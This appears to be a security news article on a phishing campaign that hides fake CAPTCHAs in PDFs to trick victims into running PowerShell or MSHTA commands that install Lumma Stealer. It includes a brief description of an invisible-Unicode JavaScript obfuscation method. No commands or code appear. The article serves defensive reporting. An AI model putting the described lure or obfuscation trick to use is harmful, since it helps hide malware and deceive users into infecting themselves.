Phishing Campaign Exploits Fake CAPTCHAs in PDFs to Spread Lumma Stealer Malware

A rapidly evolving botnet malware known as Vo1d has been actively compromising Android TV devices across multiple countries, including Brazil, South Africa, Indonesia, Argentina, and Thailand.

  Vulnerability Alerts   Mar 3, 2025  Add to Reading List
Phishing Campaign Exploits Fake CAPTCHAs in PDFs to Spread Lumma Stealer Malware

Cybersecurity researchers have uncovered a large-scale phishing campaign that uses fake CAPTCHA images embedded in PDF documents to distribute the Lumma stealer malware. The attackers host these malicious PDFs on Webflow’s content delivery network (CDN) and other platforms to lure victims into executing harmful PowerShell commands.

Massive Campaign Leveraging SEO Manipulation

According to Netskope Threat Labs, the campaign involves 260 unique domains hosting over 5,000 phishing PDFs, redirecting unsuspecting users to fraudulent websites. Attackers utilize search engine optimization (SEO) tactics to manipulate search results, tricking users into clicking on these malicious files.

Key findings include:

  • The campaign has impacted more than 1,150 organizations and over 7,000 users since mid-2024.
  • Primary targets include victims in North America, Asia, and Southern Europe, spanning industries such as technology, financial services, and manufacturing.
  • Attackers also upload malicious PDFs to legitimate online libraries like PDFCOFFEE, PDF4PRO, and Internet Archive to further deceive victims searching for documents online.

Fake CAPTCHA Lures & ClickFix Technique

These phishing PDFs use two main tactics:

  1. Credit Card Theft – Victims are directed to pages designed to steal payment details.
  2. Malware Delivery – Clicking on fake CAPTCHA images executes PowerShell commands, which download and install Lumma Stealer malware.

The ClickFix technique plays a crucial role in the infection chain, using a fake CAPTCHA page that tricks victims into running MSHTA commands, leading to malware execution.

Diverse Delivery Methods & Expanding Threat Landscape

Lumma Stealer has been disguised as Roblox games and cracked software versions, including Total Commander for Windows. Threat actors spread these malicious files through YouTube videos, comments, and descriptions, often using compromised accounts to upload deceptive content.

Lumma Stealer’s Malware-as-a-Service (MaaS) Model

Researchers at Silent Push discovered that stolen Lumma Stealer logs are being shared for free on Leaky[.]pro, a new hacking forum that emerged in late December 2024.

Lumma operates under a malware-as-a-service (MaaS) model, providing cybercriminals with access to:

  • Stolen credentials and sensitive user data.
  • A SOCKS5 proxy feature (GhostSocks), allowing attackers to bypass geographic and IP-based restrictions, increasing success rates for unauthorized financial access.

Emerging Techniques in Phishing & Malware Distribution

Recent research from Zscaler ThreatLabz and eSentire highlights similar campaigns using Vidar and Atomic macOS Stealer (AMOS), also delivered through ClickFix phishing schemes.

Meanwhile, Juniper Threat Labs has detected a JavaScript obfuscation method using invisible Unicode characters to encode payloads, making detection significantly harder. The method includes:

  • Hangul half-width (U+FFA0) and Hangul full-width (U+3164) to represent binary values (0 and 1).
  • Debugger evasion techniques that detect analysis attempts and redirect to benign sites.

With phishing and malware campaigns growing increasingly sophisticated, cybersecurity professionals emphasize the importance of vigilance, user awareness, and advanced detection mechanisms to combat evolving cyber threats.